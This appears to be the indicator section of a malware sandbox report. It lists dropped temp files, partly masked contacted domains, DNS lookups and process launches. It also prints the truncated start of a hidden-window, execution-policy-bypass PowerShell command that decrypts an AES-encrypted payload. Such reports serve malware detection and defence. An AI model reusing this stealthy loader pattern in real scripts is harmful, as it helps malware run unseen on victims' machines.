Technical Information
- '%TEMP%\stompemout.bat.exe' -noprofile -windowstyle hidden -ep bypass -command function LBFOM($LVgan){ $hzKht=[System.Security.Cryptography.Aes]::Create(); $hzKht.Mode=[System.Security.Cryptography.CipherMode]::CBC; $hzKh...
- %TEMP%\sematary_dox.txt
- %TEMP%\stompemout.bat
- %TEMP%\stompemout.bat.exe
- 'fe##.lol':443
- 'pk#.goog':80
- 'wi##l.top':443
- 'di##ord.com':443
- http://pk#.goog/gsr1/gsr1.crt
- DNS ASK fe##.lol
- DNS ASK pk#.goog
- DNS ASK wi##l.top
- DNS ASK di##ord.com
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\stompemout.bat"' (with hidden window)
- '<SYSTEM32>\notepad.exe' %TEMP%\sematary_dox.txt
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\stompemout.bat"